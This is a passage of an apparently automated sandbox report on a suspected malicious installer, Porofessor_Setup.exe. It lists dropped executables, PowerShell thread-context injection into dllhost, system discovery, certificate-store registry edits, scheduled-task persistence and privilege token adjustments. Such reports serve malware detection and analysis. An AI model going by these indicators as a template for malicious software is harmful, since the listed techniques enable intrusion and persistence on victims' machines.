File created C:\Windows\System32\$Node3Json.exe C:\Program Files\Node64.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 908 set thread context of 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\WinRAR\Temp\Updater.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe N/A
File created C:\Program Files\Node64.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\WinRAR\Temp\Updater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\System32\$Node32.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\System32\DxDiag.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\DxDiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\System32\DxDiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\System32\DxDiag.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\DxDiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\System32\DxDiag.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={48F3852C-80C8-4EFC-8BC2-B3FC8C353B59}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 02 Dec 2024 16:13:27 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733156003" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class" C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1" C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class" C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1 C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1" C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject" C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1263212995-3575756360-1418101905-1000\{968C83BC-C5A3-4A77-99E9-EF552CB3CFFA} C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B} C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\System32\\dxdiagn.dll" C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class" C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1 C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1" C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1263212995-3575756360-1418101905-1000\{B3E44E69-972B-40A0-B622-9184BC2F8E1C} C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7} C:\Windows\System32\DxDiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Windows\System32\DxDiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class" C:\Windows\System32\DxDiag.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe N/A
N/A N/A C:\Windows\System32\DxDiag.exe N/A
N/A N/A C:\Windows\System32\DxDiag.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Node64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
